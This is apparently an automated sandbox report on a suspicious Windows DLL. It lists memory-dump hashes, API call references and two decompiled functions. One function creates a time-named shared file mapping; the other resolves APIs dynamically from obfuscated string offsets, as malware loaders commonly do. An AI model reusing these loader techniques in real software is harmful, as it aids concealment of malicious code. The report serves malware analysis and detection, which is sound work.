                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction ID: e1c052020db4e65fc723426a1066abd43358c49f38e40b9b481dbb45479a0978
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84a5ec7c0079e7f92af8cc979752def55742a623ea7267c367ddf969d144cf9b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C14971C0822AABCF15CFA4CC809BEBBB5AF48318F224159E9157B241DF35D651CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D27E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D28A
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D295
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2A0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2AB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2B6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2C1
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2CC
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE3D2E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction ID: a0d095d940df9d4e950a5f75349bee08d61d88b10ae0e5b0bcd087542ff4b4a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45aec3eed34b1108637822851370a699a6a760e9032c57c6915747af7d4467eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A97A904118AFCF41DFA4C850DED7BB9FF48244B538169EA199B120DB31DA65CF80
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 65cf7fbdcd06f03837a7082aa3d7c7d33da49a6c5efcff7a354c6429826e1403
                                                                                                                                                                                                                                                          • Instruction ID: ae685c0174bfd2950cdb2dc524a756d7f9a646737ffe83045cf254a01b6ea53b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65cf7fbdcd06f03837a7082aa3d7c7d33da49a6c5efcff7a354c6429826e1403
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5C109B4E082159FDF11CF9AD880BBDBBB0BF9A318F61816DE515A7381CB349941CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                          			E6DDF1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                          				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                          				short _v60;
                                                                                                                                                                                                                                                          				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                                          				long _t18;
                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                          				long _t32;
                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t31 = __edx;
                                                                                                                                                                                                                                                          				_t14 =  &_v16;
                                                                                                                                                                                                                                                          				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                          				_push(0x192);
                                                                                                                                                                                                                                                          				_push(0x54d38000);
                                                                                                                                                                                                                                                          				_push(_v12);
                                                                                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                                                                                          				L6DDF2210();
                                                                                                                                                                                                                                                          				_push(_t14);
                                                                                                                                                                                                                                                          				_v16 = _t14;
                                                                                                                                                                                                                                                          				_t15 =  *0x6ddf41d0;
                                                                                                                                                                                                                                                          				_push(_t15 + 0x6ddf505e);
                                                                                                                                                                                                                                                          				_push(_t15 + 0x6ddf5054);
                                                                                                                                                                                                                                                          				_push(0x16);
                                                                                                                                                                                                                                                          				_push( &_v60);
                                                                                                                                                                                                                                                          				_v12 = _t31;
                                                                                                                                                                                                                                                          				L6DDF220A();
                                                                                                                                                                                                                                                          				_t18 = _a4;
                                                                                                                                                                                                                                                          				if(_t18 == 0) {
                                                                                                                                                                                                                                                          					_t18 = 0x1000;
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				_t34 = CreateFileMappingW(0xffffffff, 0x6ddf41c0, 4, 0, _t18,  &_v60);
                                                                                                                                                                                                                                                          				if(_t34 == 0) {
                                                                                                                                                                                                                                                          					_t32 = GetLastError();
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                                                                                                                                                                                                          						if(_t22 == 0) {
                                                                                                                                                                                                                                                          							_t32 = GetLastError();
                                                                                                                                                                                                                                                          							if(_t32 != 0) {
                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							 *_a8 = _t34;
                                                                                                                                                                                                                                                          							 *_a12 = _t22;
                                                                                                                                                                                                                                                          							_t32 = 0;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t32 = 2;
                                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                                          						CloseHandle(_t34);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _t32;
                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                          0x6ddf1979
                                                                                                                                                                                                                                                          0x6ddf1982
                                                                                                                                                                                                                                                          0x6ddf1986
                                                                                                                                                                                                                                                          0x6ddf198c
                                                                                                                                                                                                                                                          0x6ddf1991
                                                                                                                                                                                                                                                          0x6ddf1996
                                                                                                                                                                                                                                                          0x6ddf1999
                                                                                                                                                                                                                                                          0x6ddf199c
                                                                                                                                                                                                                                                          0x6ddf19a1
                                                                                                                                                                                                                                                          0x6ddf19a2
                                                                                                                                                                                                                                                          0x6ddf19a5
                                                                                                                                                                                                                                                          0x6ddf19b0
                                                                                                                                                                                                                                                          0x6ddf19b7
                                                                                                                                                                                                                                                          0x6ddf19bb
                                                                                                                                                                                                                                                          0x6ddf19bd
                                                                                                                                                                                                                                                          0x6ddf19be
                                                                                                                                                                                                                                                          0x6ddf19c1
                                                                                                                                                                                                                                                          0x6ddf19c6
                                                                                                                                                                                                                                                          0x6ddf19d0
                                                                                                                                                                                                                                                          0x6ddf19d2
                                                                                                                                                                                                                                                          0x6ddf19d2
                                                                                                                                                                                                                                                          0x6ddf19ec
                                                                                                                                                                                                                                                          0x6ddf19f0
                                                                                                                                                                                                                                                          0x6ddf1a40
                                                                                                                                                                                                                                                          0x6ddf19f2
                                                                                                                                                                                                                                                          0x6ddf19fb
                                                                                                                                                                                                                                                          0x6ddf1a11
                                                                                                                                                                                                                                                          0x6ddf1a19
                                                                                                                                                                                                                                                          0x6ddf1a2b
                                                                                                                                                                                                                                                          0x6ddf1a2f
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1a1b
                                                                                                                                                                                                                                                          0x6ddf1a1e
                                                                                                                                                                                                                                                          0x6ddf1a23
                                                                                                                                                                                                                                                          0x6ddf1a25
                                                                                                                                                                                                                                                          0x6ddf1a25
                                                                                                                                                                                                                                                          0x6ddf1a06
                                                                                                                                                                                                                                                          0x6ddf1a08
                                                                                                                                                                                                                                                          0x6ddf1a31
                                                                                                                                                                                                                                                          0x6ddf1a32
                                                                                                                                                                                                                                                          0x6ddf1a32
                                                                                                                                                                                                                                                          0x6ddf19fb
                                                                                                                                                                                                                                                          0x6ddf1a48

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?,?), ref: 6DDF1986
                                                                                                                                                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DDF199C
                                                                                                                                                                                                                                                          • _snwprintf.NTDLL ref: 6DDF19C1
                                                                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,6DDF41C0,00000004,00000000,?,?), ref: 6DDF19E6
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?), ref: 6DDF19FD
                                                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6DDF1A11
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?), ref: 6DDF1A29
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A), ref: 6DDF1A32
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DDF176E,0000000A,?), ref: 6DDF1A3A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1724014008-0
                                                                                                                                                                                                                                                          • Opcode ID: 9a0b7cee1b695fc9ac521484e49976a5aa867618704d11b6b3dfa8b3dc2770c6
                                                                                                                                                                                                                                                          • Instruction ID: bb54a91b1a408e9fe4119dab77491465bcb21a1a3a0bc867c01dcfdf8542065a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0b7cee1b695fc9ac521484e49976a5aa867618704d11b6b3dfa8b3dc2770c6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821B0B2540109FFEB21BFA8DC85FAE7BBCEB49354F12806AF611D7140D73199468B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE45818: _free.LIBCMT ref: 6DE4583D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4589E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458A9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458B4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45908
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45913
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4591E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45929
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction ID: baf96037eac13d19cd2360a1db81b5c30eff35fee0657e86b3a6d5557acc8f2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111A271548B48A6D660A770DC06FEB779CAF48704F938C2CE7AE66050CF65B4208F90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6DE43593
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE43772
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE4378F
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,6DE3F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE437D7
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DE43817
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE438C3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4031098158-0
                                                                                                                                                                                                                                                          • Opcode ID: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction ID: 0c2daef5d81effb8130cf842e636622c31e7ec39b1acfa1e498102d46019e25c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D1A9B5D002599FCB15CFE8D880AEDFBB5BF49314F24806AE855BB381DB31A946CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t56 = E6DDF1C8F(0x20);
                                                                                                                                                                                                                                                          				if(_t56 == 0) {
                                                                                                                                                                                                                                                          					_v8 = 8;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					_t50 = GetModuleHandleA( *0x6ddf41d0 + 0x6ddf5014);
                                                                                                                                                                                                                                                          					_v8 = 0x7f;
                                                                                                                                                                                                                                                          					_t29 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf50e1);
                                                                                                                                                                                                                                                          					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                          					if(_t29 == 0) {
                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                          						E6DDF136A(_t56);
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t33 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf50f1);
                                                                                                                                                                                                                                                          						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                          						if(_t33 == 0) {
                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							_t36 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf5104);
                                                                                                                                                                                                                                                          							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                          							if(_t36 == 0) {
                                                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          								_t39 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf5119);
                                                                                                                                                                                                                                                          								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                          								if(_t39 == 0) {
                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                          									_t42 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf512f);
                                                                                                                                                                                                                                                          									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                          									if(_t42 == 0) {
                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                          										_t46 = E6DDF18D1(_t56, _a12);
                                                                                                                                                                                                                                                          										_v8 = _t46;
                                                                                                                                                                                                                                                          										if(_t46 != 0) {
                                                                                                                                                                                                                                                          											goto L8;
                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                          											 *_a16 = _t56;
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                          0x6ddf1ab3
                                                                                                                                                                                                                                                          0x6ddf1ab7
                                                                                                                                                                                                                                                          0x6ddf1b78
                                                                                                                                                                                                                                                          0x6ddf1abd
                                                                                                                                                                                                                                                          0x6ddf1ad5
                                                                                                                                                                                                                                                          0x6ddf1ae4
                                                                                                                                                                                                                                                          0x6ddf1aeb
                                                                                                                                                                                                                                                          0x6ddf1aef
                                                                                                                                                                                                                                                          0x6ddf1af2
                                                                                                                                                                                                                                                          0x6ddf1b70
                                                                                                                                                                                                                                                          0x6ddf1b71
                                                                                                                                                                                                                                                          0x6ddf1af4
                                                                                                                                                                                                                                                          0x6ddf1b01
                                                                                                                                                                                                                                                          0x6ddf1b05
                                                                                                                                                                                                                                                          0x6ddf1b08
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b0a
                                                                                                                                                                                                                                                          0x6ddf1b17
                                                                                                                                                                                                                                                          0x6ddf1b1b
                                                                                                                                                                                                                                                          0x6ddf1b1e
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b20
                                                                                                                                                                                                                                                          0x6ddf1b2d
                                                                                                                                                                                                                                                          0x6ddf1b31
                                                                                                                                                                                                                                                          0x6ddf1b34
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b36
                                                                                                                                                                                                                                                          0x6ddf1b43
                                                                                                                                                                                                                                                          0x6ddf1b47
                                                                                                                                                                                                                                                          0x6ddf1b4a
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b4c
                                                                                                                                                                                                                                                          0x6ddf1b52
                                                                                                                                                                                                                                                          0x6ddf1b58
                                                                                                                                                                                                                                                          0x6ddf1b5d
                                                                                                                                                                                                                                                          0x6ddf1b64
                                                                                                                                                                                                                                                          0x6ddf1b67
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b69
                                                                                                                                                                                                                                                          0x6ddf1b6c
                                                                                                                                                                                                                                                          0x6ddf1b6c
                                                                                                                                                                                                                                                          0x6ddf1b67
                                                                                                                                                                                                                                                          0x6ddf1b4a
                                                                                                                                                                                                                                                          0x6ddf1b34
                                                                                                                                                                                                                                                          0x6ddf1b1e
                                                                                                                                                                                                                                                          0x6ddf1b08
                                                                                                                                                                                                                                                          0x6ddf1af2
                                                                                                                                                                                                                                                          0x6ddf1b86

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1C8F: HeapAlloc.KERNEL32(00000000,?,6DDF117D,?,00000000,00000000,?,?,?,6DDF1810), ref: 6DDF1C9B
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1AC9
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6DDF1AEB
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6DDF1B01
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6DDF1B17
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6DDF1B2D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 6DDF1B43
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF18D1: memset.NTDLL ref: 6DDF1950
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$AllocHandleHeapModulememset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 426539879-0
                                                                                                                                                                                                                                                          • Opcode ID: a59566187f7080b23d4e1138834831f1fc1b37355828af8598f3045a5501f075
                                                                                                                                                                                                                                                          • Instruction ID: 8170811d60e1b98bba998f0ad9d20281b82669e3ab7ddce2c02f9b41ccdf9283
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a59566187f7080b23d4e1138834831f1fc1b37355828af8598f3045a5501f075
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB21F1F150060ADFD710FF69E940F6677F8EB0A784B028555F915C7211E731E9028BA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE391A7
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DE391B5
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DE391CE
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE39220
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction ID: beeee3ca464836ae6f426a96a93b45ba3c6297a59bd4f9d58c41d3c3ec9754b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D47224D6369EEB1955B56C88B7A36F4EB0377C733062DE620A61D0EF528851D140
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 1740715915-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction ID: b96f7f787ae87b698e0b9b9e3e9bedae5aff02ac2117288a903840a2bb2cd1a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1519FB2A086239FDB1A8E55DC80BBA77A4FF45718F33452DE916962D0DF31E841C790
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6DE4120C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-1872383224
                                                                                                                                                                                                                                                          • Opcode ID: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction ID: 0f2e82e49dea864df4d875295f818627a349fc2bdccb5d8702f8b1dc0d03c57b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A21B371608216AF9F105FE5AC8096777BCAB4136C721C618FA28E7240FF31EC6197A4
